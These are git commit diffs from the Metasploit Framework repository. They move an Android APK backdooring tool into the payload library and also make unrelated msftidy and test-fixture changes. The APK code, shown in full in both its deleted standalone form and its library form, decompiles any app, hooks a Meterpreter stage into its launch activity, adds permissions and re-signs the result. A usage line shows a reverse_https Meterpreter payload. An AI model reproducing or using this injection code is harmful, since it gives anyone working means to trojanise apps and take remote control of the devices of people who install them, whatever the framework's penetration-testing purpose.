+- tools/exploit/apk_backdoor.rb | 255 ------------------------------ 3 files changed, 36 insertions(+), 323 deletions(-) delete mode 100755 tools/exploit/apk_backdoor.rb diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index bdfdb4421d..107d70d5b7 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'msf/core' +require 'rex/text' require 'tmpdir' require 'nokogiri' require 'fileutils' @@ -9,6 +10,21 @@ require 'open3' module Msf::Payload::Apk + class ApkBackdoor + include Msf::Payload::Apk + def backdoor_apk(apk, payload) + backdoor_payload(apk, payload) + end + end + + def print_status(msg='') + $stderr.puts "[*] #{msg}" + end + + def print_error(msf='') + $stderr.puts "[-] #{msg}" + end + def usage print_error "Usage: #{$0} [target.apk] [msfvenom options]\n" print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" @@ -46,46 +62,6 @@ module Msf::Payload::Apk end end - # If XML parsing of the manifest fails, recursively search - # the smali code for the onCreate() hook and let the user - # pick the injection point - - def scrape_files_for_launcher_activity(tempdir) - smali_files||=[] - Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| - checkFile=File.read(file) - if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") - smali_files << file - smalifile = file - activitysmali = checkFile - end - end - i=0 - print_status "[*] Please choose from one of the following:\n" - smali_files.each{|s_file| - print_status "[+] Hook point ",i,": ",s_file,"\n" - i+=1 - } - hook=-1 - while (hook < 0 || hook>i) - print_status "\nHook: " - hook = STDIN.gets.chomp.to_i - end - i=0 - smalifile="" - activitysmali="" - smali_files.each{|s_file| - if (i==hook) - checkFile=File.read(s_file) - smalifile=s_file - activitysmali = checkFile - break - end - i+=1 - } - return [smalifile,activitysmali] - end - def fix_manifest(tempdir) payload_permissions=[] @@ -119,7 +95,7 @@ module Msf::Payload::Apk add_permissions=[] for permission in payload_permissions if !(original_permissions.include? permission) - print_status "[*] Adding #{permission}\n" + print_status("Adding #{permission}") add_permissions << permission end end @@ -149,19 +125,19 @@ module Msf::Payload::Apk jarsigner = run_cmd("jarsigner") unless jarsigner != nil - print_error "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + print_error("jarsigner not found. If it's not in your PATH, please add it.") exit(1) end apktool = run_cmd("apktool -version") unless apktool != nil - print_error "[-] apktool not found. If it's not in your PATH, please add it.\n" + print_error "apktool not found. If it's not in your PATH, please add it." exit(1) end apk_v = Gem::Version.new(apktool) unless apk_v >= Gem::Version.new('2.0.1') - print_error "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + print_error "apktool version #{apk_v} not supported, please download at least version 2.0.1." exit(1) end @@ -171,54 +147,46 @@ module Msf::Payload::Apk File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } FileUtils.cp apkfile, "#{tempdir}/original.apk" - print_status "[*] Decompiling original APK..\n" + print_status "Decompiling original APK..\n" run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") - print_status "[*] Decompiling payload APK..\n" + print_status "Decompiling payload APK..\n" run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") f = File.open("#{tempdir}/original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close - print_status "[*] Locating onCreate() hook..\n" + print_status "Locating onCreate() hook..\n" launcheractivity = find_launcher_activity(amanifest) smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" begin activitysmali = File.read(smalifile) rescue Errno::ENOENT - print_status "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - print_error "[-] Error finding launcher activity. Exiting" - exit(1) - end + print_status "Unable to find correct hook automatically\n" + exit end - print_status "[*] Copying payload files..\n" + print_status "Copying payload files..\n" FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" activitycreate = ';->onCreate(Landroid/os/Bundle;)V' payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) - print_status "[*] Loading ",smalifile," and injecting payload..\n" + print_status "Loading #{smalifile} and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } - injected_apk = apkfile.sub('.apk', '_backdoored.apk') - - print_status "[*] Poisoning the manifest with meterpreter permissions..\n" + injected_apk = "#{tempdir}/output.apk" + print_status "Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) - print_status "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") - print_status "[*] Signing #{injected_apk}\n" + print_status "Signing #{injected_apk}\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + outputapk = File.read(injected_apk) + rescue FileUtils.remove_entry tempdir - - puts "[+] Infected file #{injected_apk} ready.\n" end end diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index b051bbc97e..11434d52e4 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -310,9 +310,9 @@ module Msf cli_print "Payload size: #{raw_payload.length} bytes" raw_payload elsif payload.start_with? "android/" - cli_print "Using template: #{template}" - - raw_payload = generate_raw_payload + cli_print "Using APK template: #{template}" + apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new() + raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload) cli_print "Payload size: #{raw_payload.length} bytes" raw_payload else diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb deleted file mode 100755 index fd6e2ca56d..0000000000 --- a/tools/exploit/apk_backdoor.rb +++ /dev/null @@ -1,255 +0,0 @@ -#!/usr/bin/env ruby -# -# This script is a POC for injecting metasploit payloads on -# arbitrary APKs. -# Authored by timwr, Jack64 -# - -require 'tmpdir' -require 'nokogiri' -require 'fileutils' -require 'optparse' -require 'open3' - -def usage - $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" -end - -def run_cmd(cmd) - begin - stdin, stdout, stderr = Open3.popen3(cmd) - return stdout.read + stderr.read - rescue Errno::ENOENT - return nil - end -end - - -# Find the activity that is opened when you click the app icon -def find_launcher_activity(amanifest) - package = amanifest.xpath("//manifest").first['package'] - activities = amanifest.xpath("//activity|//activity-alias") - for activity in activities - activityname = activity.attribute("name") - category = activity.search('category') - unless category - next - end - for cat in category - categoryname = cat.attribute('name') - if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') - activityname = activityname.to_s - unless activityname.start_with?(package) - activityname = package + activityname - end - return activityname - end - end - end -end - -# If XML parsing of the manifest fails, recursively search -# the smali code for the onCreate() hook and let the user -# pick the injection point - -def scrape_files_for_launcher_activity(tempdir) - smali_files||=[] - Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| - checkFile=File.read(file) - if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") - smali_files << file - smalifile = file - activitysmali = checkFile - end - end - i=0 - print "[*] Please choose from one of the following:\n" - smali_files.each{|s_file| - print "[+] Hook point ",i,": ",s_file,"\n" - i+=1 - } - hook=-1 - while (hook < 0 || hook>i) - print "\nHook: " - hook = STDIN.gets.chomp.to_i - end - i=0 - smalifile="" - activitysmali="" - smali_files.each{|s_file| - if (i==hook) - checkFile=File.read(s_file) - smalifile=s_file - activitysmali = checkFile - break - end - i+=1 - } - return [smalifile,activitysmali] -end - -def fix_manifest(tempdir) - payload_permissions=[] - - #Load payload's permissions - File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| - k=File.read(file) - payload_manifest=Nokogiri::XML(k) - permissions = payload_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - payload_permissions << name.to_s - end - } - - original_permissions=[] - apk_mani="" - - #Load original apk's permissions - File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| - k=File.read(file2) - apk_mani=k - original_manifest=Nokogiri::XML(k) - permissions = original_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - original_permissions << name.to_s - end - } - - #Get permissions that are not in original APK - add_permissions=[] - for permission in payload_permissions - if !(original_permissions.include? permission) - print "[*] Adding #{permission}\n" - add_permissions << permission - end - end - - inject=0 - new_mani="" - #Inject permissions in original APK's manifest - for line in apk_mani.split("\n") - if (line.include? "uses-permission" and inject==0) - for permission in add_permissions - new_mani << ''+"\n" - end - new_mani << line+"\n" - inject=1 - else - new_mani << line+"\n" - end - end - File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } -end - -def backdoor_payload(apkfile, raw_payload) - unless apkfile && File.readable?(apkfile) - usage - exit(1) - end - - jarsigner = run_cmd("jarsigner") - unless jarsigner != nil - $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" - exit(1) - end - - apktool = run_cmd("apktool -version") - unless apktool != nil - $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" - exit(1) - end - - apk_v = Gem::Version.new(apktool) - unless apk_v >= Gem::Version.new('2.0.1') - $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" - exit(1) - end - - #Create temporary directory where work will be done - tempdir = Dir.mktmpdir - - File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } - FileUtils.cp apkfile, "#{tempdir}/original.apk" - - print "[*] Decompiling original APK..\n" - run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") - print "[*] Decompiling payload APK..\n" - run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") - - f = File.open("#{tempdir}/original/AndroidManifest.xml") - amanifest = Nokogiri::XML(f) - f.close - - print "[*] Locating onCreate() hook..\n" - - launcheractivity = find_launcher_activity(amanifest) - smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" - begin - activitysmali = File.read(smalifile) - rescue Errno::ENOENT - print "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - $stderr.puts "[-] Error finding launcher activity. Exiting" - exit(1) - end - end - - print "[*] Copying payload files..\n" - FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") - FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" - activitycreate = ';->onCreate(Landroid/os/Bundle;)V' - payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" - hookedsmali = activitysmali.gsub(activitycreate, payloadhook) - print "[*] Loading ",smalifile," and injecting payload..\n" - File.open(smalifile, "wb") {|file| file.puts hookedsmali } - injected_apk = apkfile.sub('.apk', '_backdoored.apk') - - print "[*] Poisoning the manifest with meterpreter permissions..\n" - fix_manifest(tempdir) - - print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" - run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") - print "[*] Signing #{injected_apk}\n" - run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") - - FileUtils.remove_entry tempdir - - puts "[+] Infected file #{injected_apk} ready.\n" -end - -if __FILE__ == $0 - begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } - rescue - $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" - usage - exit(1) - end - - print "[*] Generating msfvenom payload..\n" - msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) - msfvenom_command = "#{msfvenom_path} -f raw #{opts}" - begin - stdin, stdout, stderr = Open3.popen3(msfvenom_command) - payload = stdout.read - msfvenom_output = stderr.read - backdoor_payload(ARGV[0], payload) - rescue Errno::ENOENT - $stderr.puts msfvenom_output - exit(1) - end - -end - From d2a9aa18d89b1be5055f0597aad96913e3d3f327 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 16:06:01 +0000 Subject: [PATCH 158/686] fix sillyness --- lib/msf/core/payload_generator.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 11434d52e4..74ee6b6c4e 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -309,7 +309,7 @@ module Msf raw_payload = generate_java_payload cli_print "Payload size: #{raw_payload.length} bytes" raw_payload - elsif payload.start_with? "android/" + elsif payload.start_with? "android/" and not template.blank? cli_print "Using APK template: #{template}" apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new() raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload) From 26fa916cc940f5552edd8d54c160247bb50a5f95 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Tue, 22 Dec 2015 13:38:31 -0800 Subject: [PATCH 159/686] Update msftidy to error when module super class is incorrect Fixes #6365 --- tools/dev/msftidy.rb | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 19b95e2053..3e98718cb8 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -65,6 +65,7 @@ class Msftidy def initialize(source_file) @full_filepath = source_file + @module_type = File.dirname(File.expand_path(@full_filepath))[/\/modules\/([^\/]+)/, 1] @source = load_file(source_file) @lines = @source.lines # returns an enumerator @status = OK @@ -471,6 +472,33 @@ class Msftidy end end + def check_bad_super_class + # skip payloads, as they don't have a super class + return if @module_type == 'payloads' + + # get the super class in an ugly way + unless (super_class = @source.scan(/class Metasploit\d\s+<\s+(\S+)/).flatten.first) + error('Unable to determine super class') + return + end + + prefix_super_map = { + 'auxiliary' => /Msf::Auxiliary$/, + 'exploits' => /Msf::Exploit(?:::Local|::Remote)?$/, + 'encoders' => /^(?:Msf|Rex)::Encoder/, + 'nops' => /^Msf::Nop$/, + 'post' => /^Msf::Post$/ + } + + if prefix_super_map.key?(@module_type) + unless super_class =~ prefix_super_map[@module_type] + error("Invalid super class for #{@module_type} module (found '#{super_class}', expected something like #{prefix_super_map[@module_type]}") + end + else + warn("Unexpected and potentially incorrect super class found ('#{super_class}')") + end + end + def check_function_basics functions = @source.scan(/def (\w+)\(*(.+)\)*/) @@ -691,6 +719,7 @@ def run_checks(full_filepath) tidy.check_disclosure_date tidy.check_title_casing tidy.check_bad_terms + tidy.check_bad_super_class tidy.check_function_basics tidy.check_lines tidy.check_snake_case_filename From 391145a4afb905e147e0dc972738bb30bca0806d Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 23 Dec 2015 15:14:37 +0000 Subject: [PATCH 160/686] Checking if group_filter is empty --- modules/post/windows/gather/ad_to_sqlite.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_to_sqlite.rb b/modules/post/windows/gather/ad_to_sqlite.rb index 22294cf960..7cdeccb412 100644 --- a/modules/post/windows/gather/ad_to_sqlite.rb +++ b/modules/post/windows/gather/ad_to_sqlite.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post vprint_status "Retrieving AD Groups" begin group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment', 'managedBy', 'cn'] - if datastore['GROUP_FILTER'].empty? + if datastore['GROUP_FILTER'].nil? || datastore['GROUP_FILTER'].empty? group_query = "(objectClass=group)" else group_query = "(&(objectClass=group)(#{datastore['GROUP_FILTER']}))" From 6b0ae754bd05ff7feca104b0414e30217fdb93d6 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Wed, 23 Dec 2015 08:33:47 -0800 Subject: [PATCH 161/686] Anchor all regexen --- tools/dev/msftidy.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 3e98718cb8..73d9aee2a3 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -483,8 +483,8 @@ class Msftidy end prefix_super_map = { - 'auxiliary' => /Msf::Auxiliary$/, - 'exploits' => /Msf::Exploit(?:::Local|::Remote)?$/, + 'auxiliary' => /^Msf::Auxiliary$/, + 'exploits' => /^Msf::Exploit(?:::Local|::Remote)?$/, 'encoders' => /^(?:Msf|Rex)::Encoder/, 'nops' => /^Msf::Nop$/, 'post' => /^Msf::Post$/ From 83f0c2fa054a7162bb6af7446fe02806c963d9ff Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Wed, 23 Dec 2015 12:53:12 -0800 Subject: [PATCH 162/686] Add beginnings of rspec coverage for msftidy --- .../modules/auxiliary/auxiliary_tidy.rb | 22 +++++++++++++ .../modules/auxiliary/auxiliary_untidy.rb | 23 +++++++++++++ .../modules/payloads/payload_tidy.rb | 17 ++++++++++ spec/tools/dev/msftidy_spec.rb | 32 +++++++++++++++++++ 4 files changed, 94 insertions(+) create mode 100644 spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb create mode 100644 spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb create mode 100644 spec/file_fixtures/modules/payloads/payload_tidy.rb create mode 100644 spec/tools/dev/msftidy_spec.rb diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb new file mode 100644 index 0000000000..7dc728b013 --- /dev/null +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb @@ -0,0 +1,22 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Tidy Auxiliary Module for RSpec' + 'Description' => 'Test!' + }, + 'Author' => %w(Unknown), + 'License' => MSF_LICENSE, + ) + ) + end +end + diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb new file mode 100644 index 0000000000..ddf7c73da2 --- /dev/null +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb @@ -0,0 +1,23 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +# XXX: invalid super class for an auxiliary module +class Metasploit4 < Msf::Exploit + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Untidy Auxiliary Module for RSpec' + 'Description' => 'Test!' + }, + 'Author' => %w(Unknown), + 'License' => MSF_LICENSE, + ) + ) + end +end + diff --git a/spec/file_fixtures/modules/payloads/payload_tidy.rb b/spec/file_fixtures/modules/payloads/payload_tidy.rb new file mode 100644 index 0000000000..6182da4663 --- /dev/null +++ b/spec/file_fixtures/modules/payloads/payload_tidy.rb @@ -0,0 +1,17 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +module Metasploit4 + def initialize(info = {}) + super( + merge_info( + info, + 'Name' => 'Unix Command Shell, Bind TCP (via AWK)', + 'Description' => 'Listen for a connection and spawn a command shell via GNU AWK', + ) + ) + end +end diff --git a/spec/tools/dev/msftidy_spec.rb b/spec/tools/dev/msftidy_spec.rb new file mode 100644 index 0000000000..c48c97c2b5 --- /dev/null +++ b/spec/tools/dev/msftidy_spec.rb @@ -0,0 +1,32 @@ +RSpec.describe 'msftidy utility' do + let(:msftidy) { File.expand_path('tools/dev/msftidy.rb') } + + it "shows Usage if invalid arguments are provided" do + expect { system(msftidy) }.to output(/Usage/).to_stderr_from_any_process + end + + context "with a tidy auxiliary module" do + let(:auxiliary_tidy) { File.expand_path('modules/auxiliary/auxiliary_tidy.rb', FILE_FIXTURES_PATH) } + + it "outputs nothing" do + expect { system("#{msftidy} #{auxiliary_tidy}") }.to_not output.to_stdout_from_any_process + end + end + + context "with an untidy auxiliary module" do + let(:auxiliary_untidy) { File.expand_path('modules/auxiliary/auxiliary_untidy.rb', FILE_FIXTURES_PATH) } + + it "outputs expected errors and warnings" do + expect { system("#{msftidy} #{auxiliary_untidy}") }.to \ + output(/ERROR.*Invalid super class for auxiliary module/).to_stdout_from_any_process + end + end + + context "with a tidy payload module" do + let(:payload_tidy) { File.expand_path('modules/payloads/payload_tidy.rb', FILE_FIXTURES_PATH) } + + it "outputs nothing" do + expect { system("#{msftidy} #{payload_tidy}") }.to_not output.to_stdout_from_any_process + end + end +end From 5ac4e9aa6bd0bf2efc4b9f5cac31a72ea53e2a46 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Wed, 23 Dec 2015 12:55:01 -0800 Subject: [PATCH 163/686] Correct payload fixture --- spec/file_fixtures/modules/payloads/payload_tidy.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/spec/file_fixtures/modules/payloads/payload_tidy.rb b/spec/file_fixtures/modules/payloads/payload_tidy.rb index 6182da4663..6a59fc28e2 100644 --- a/spec/file_fixtures/modules/payloads/payload_tidy.rb +++ b/spec/file_fixtures/modules/payloads/payload_tidy.rb @@ -9,8 +9,8 @@ module Metasploit4 super( merge_info( info, - 'Name' => 'Unix Command Shell, Bind TCP (via AWK)', - 'Description' => 'Listen for a connection and spawn a command shell via GNU AWK', + 'Name' => 'Tidy Payload for RSpec', + 'Description' => 'Test!' ) ) end From 69b65e7d397ff4aa247629fad508da5cc175f6f8 Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 24 Dec 2015 09:13:56 +0000 Subject: [PATCH 164/686] fix error handling --- lib/msf/core/payload/apk.rb | 23 ++++++++++------------- 1 file changed, 10 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index 107d70d5b7..62764370a0 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -21,13 +21,13 @@ module Msf::Payload::Apk $stderr.puts "[*] #{msg}" end - def print_error(msf='') + def print_error(msg='') $stderr.puts "[-] #{msg}" end def usage - print_error "Usage: #{$0} [target.apk] [msfvenom options]\n" - print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n" + print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" end def run_cmd(cmd) @@ -120,25 +120,22 @@ module Msf::Payload::Apk def backdoor_payload(apkfile, raw_payload) unless apkfile && File.readable?(apkfile) usage - exit(1) + raise RuntimeError, "Invalid template: #{apkfile}" end jarsigner = run_cmd("jarsigner") unless jarsigner != nil - print_error("jarsigner not found. If it's not in your PATH, please add it.") - exit(1) + raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it." end apktool = run_cmd("apktool -version") unless apktool != nil - print_error "apktool not found. If it's not in your PATH, please add it." - exit(1) + raise RuntimeError, "apktool not found. If it's not in your PATH, please add it." end apk_v = Gem::Version.new(apktool) unless apk_v >= Gem::Version.new('2.0.1') - print_error "apktool version #{apk_v} not supported, please download at least version 2.0.1." - exit(1) + raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1." end #Create temporary directory where work will be done @@ -163,8 +160,7 @@ module Msf::Payload::Apk begin activitysmali = File.read(smalifile) rescue Errno::ENOENT - print_status "Unable to find correct hook automatically\n" - exit + raise RuntimeError, "Unable to find hook point in #{apkfile}\n" end print_status "Copying payload files..\n" @@ -185,8 +181,9 @@ module Msf::Payload::Apk run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") outputapk = File.read(injected_apk) - rescue + FileUtils.remove_entry tempdir + outputapk end end From 5d0e868fd6422bafaf102c57398837acac8a46ef Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 24 Dec 2015 12:21:08 +0000 Subject: [PATCH 165/686] facebook.orca fixes --- lib/msf/core/payload/apk.rb | 46 +++++++++++++++++++++++++------------ 1 file changed, 31 insertions(+), 15 deletions(-) diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index 62764370a0..7aa9c34bb6 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -44,7 +44,10 @@ module Msf::Payload::Apk package = amanifest.xpath("//manifest").first['package'] activities = amanifest.xpath("//activity|//activity-alias") for activity in activities - activityname = activity.attribute("name") + activityname = activity.attribute("targetActivity") + unless activityname + activityname = activity.attribute("name") + end category = activity.search('category') unless category next @@ -52,11 +55,11 @@ module Msf::Payload::Apk for cat in category categoryname = cat.attribute('name') if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') - activityname = activityname.to_s - unless activityname.start_with?(package) - activityname = package + activityname + name = activityname.to_s + if name.start_with?('.') + name = package + name end - return activityname + return name end end end @@ -153,22 +156,35 @@ module Msf::Payload::Apk amanifest = Nokogiri::XML(f) f.close - print_status "Locating onCreate() hook..\n" - + print_status "Locating hook point..\n" launcheractivity = find_launcher_activity(amanifest) - smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" - begin - activitysmali = File.read(smalifile) - rescue Errno::ENOENT - raise RuntimeError, "Unable to find hook point in #{apkfile}\n" + unless launcheractivity + raise RuntimeError, "Unable to find hookable activity in #{apkfile}\n" + end + smalifile = "#{tempdir}/original/smali*/" + launcheractivity.gsub(/\./, "/") + ".smali" + smalifiles = Dir.glob(smalifile) + for smalifile in smalifiles + if File.readable?(smalifile) + activitysmali = File.read(smalifile) + end + end + + unless activitysmali + raise RuntimeError, "Unable to find hook point in #{smalifiles}\n" + end + + entrypoint = ';->onCreate(Landroid/os/Bundle;)V' + unless activitysmali.include? entrypoint + raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n" end print_status "Copying payload files..\n" FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" - activitycreate = ';->onCreate(Landroid/os/Bundle;)V' - payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" - hookedsmali = activitysmali.gsub(activitycreate, payloadhook) + + payloadhook = entrypoint + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(entrypoint, payloadhook) + print_status "Loading #{smalifile} and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } injected_apk = "#{tempdir}/output.apk" From 140637ef4324a031a65726aa06e4463fcae520d6 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 24 Dec 2015 10:54:13 -0800 Subject: [PATCH 166/686] Refactor msftidy to allow easier stdout/stderr testing --- tools/dev/msftidy.rb | 123 +++++++++++++++++++++---------------------- 1 file changed, 61 insertions(+), 62 deletions(-) diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 73d9aee2a3..caa1c17474 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -465,9 +465,9 @@ class Msftidy def check_bad_terms # "Stack overflow" vs "Stack buffer overflow" - See explanation: # http://blogs.technet.com/b/srd/archive/2009/01/28/stack-overflow-stack-exhaustion-not-the-same-as-stack-buffer-overflow.aspx - if @source =~ /class Metasploit\d < Msf::Exploit::Remote/ and @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i + if @module_type == 'exploit' && @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i warn('Contains "stack overflow" You mean "stack buffer overflow"?') - elsif @source =~ /class Metasploit\d < Msf::Auxiliary/ and @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i + elsif @module_type == 'auxiliary' && @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i warn('Contains "stack overflow" You mean "stack exhaustion"?') end end @@ -585,7 +585,7 @@ class Msftidy end # Auxiliary modules do not have a rank attribute - if ln =~ /^\s*Rank\s*=\s*/ and @source =~ /<\sMsf::Auxiliary/ + if ln =~ /^\s*Rank\s*=\s*/ && @module_type == 'auxiliary' warn("Auxiliary modules have no 'Rank': #{ln}", idx) end @@ -680,6 +680,40 @@ class Msftidy end end + # + # Run all the msftidy checks. + # + def run_checks + check_mode + check_shebang + check_nokogiri + check_rubygems + check_ref_identifiers + check_old_keywords + check_verbose_option + check_badchars + check_extname + check_old_rubies + check_ranking + check_disclosure_date + check_title_casing + check_bad_terms + check_bad_super_class + check_function_basics + check_lines + check_snake_case_filename + check_comment_splat + check_vuln_codes + check_vars_get + check_newline_eof + check_sock_get + check_udp_sock_get + check_invalid_url_scheme + check_print_debug + check_register_datastore_debug + check_use_datastore_debug + end + private def load_file(file) @@ -698,72 +732,37 @@ class Msftidy end 